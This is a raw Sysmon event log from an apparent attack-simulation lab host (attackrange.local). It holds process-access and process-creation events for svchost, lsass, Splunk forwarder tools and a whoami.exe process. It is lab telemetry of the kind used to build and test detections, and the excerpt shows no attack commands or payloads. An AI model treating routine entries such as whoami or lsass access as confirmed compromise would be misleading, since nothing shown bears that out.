15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005673Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE0-5FA1-2E01-000000008801}3284C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005672Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005671Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7CE0-5FA1-2D01-000000008801}20524676C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CE0-5FA1-2E01-000000008801}3284C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005670Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.263{D28789B6-7CE0-5FA1-2E01-000000008801}3284C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CE0-5FA1-2D01-000000008801}2052C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000005669Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE0-5FA1-2D01-000000008801}2052C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005668Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005667Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005666Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005665Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005664Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005663Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005662Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005661Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005660Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005659Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CE0-5FA1-2D01-000000008801}2052C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005658Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7CDE-5FA1-2301-000000008801}35642604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CE0-5FA1-2D01-000000008801}2052C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005657Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.258{D28789B6-7CE0-5FA1-2D01-000000008801}2052C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000005656Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.239{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005655Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.239{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005654Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.223{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005653Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.223{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005652Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.223{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005651Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.223{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005650Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.160{D28789B6-7CDF-5FA1-2C01-000000008801}49923376C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006007Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-4501-000000008801}3092C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006006Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 